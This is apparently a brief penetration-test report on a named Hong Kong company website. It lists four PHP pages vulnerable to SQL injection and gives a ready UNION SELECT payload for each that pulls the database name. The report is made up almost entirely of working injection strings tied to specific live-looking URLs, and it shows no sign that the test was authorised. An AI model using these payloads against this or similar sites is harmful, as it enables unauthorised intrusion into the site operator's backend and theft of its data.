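Target site
Penetration test of the target site http://www.techmart.com.hk
Test results
**Vulnerability type:** SQL injection
**Severity:** Medium
**Impact:** Affects the backend
Vulnerable locations: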
- /Coating_Services/latest_news_detail.php?id=1
- /Coating_Services/product.php?id=1
- /Industrial_Machinery/latest_news_detail.php?id=10
- /Industrial_Machinery/product.php?id=1
Reproduction:
- /Coating_Services/latest_news_detail.php?id=1:
  - poc: `?id=-1 union select 1,2,3,database(),5,6--+`
- /Coating_Services/product.php?id=1:
  - poc: `?id=-1 union select 1,2,3,4,5,database(),7,8,9--+`
- /Industrial_Machinery/latest_news_detail.php?id=10:
  - poc: `?id=-1 union select 1,2,database(),4,5--+`
- /Industrial_Machinery/product.php?id=1:
  - poc: `?id=-1 union select 1,2,3,4,5,database(),7,8,9,10--+`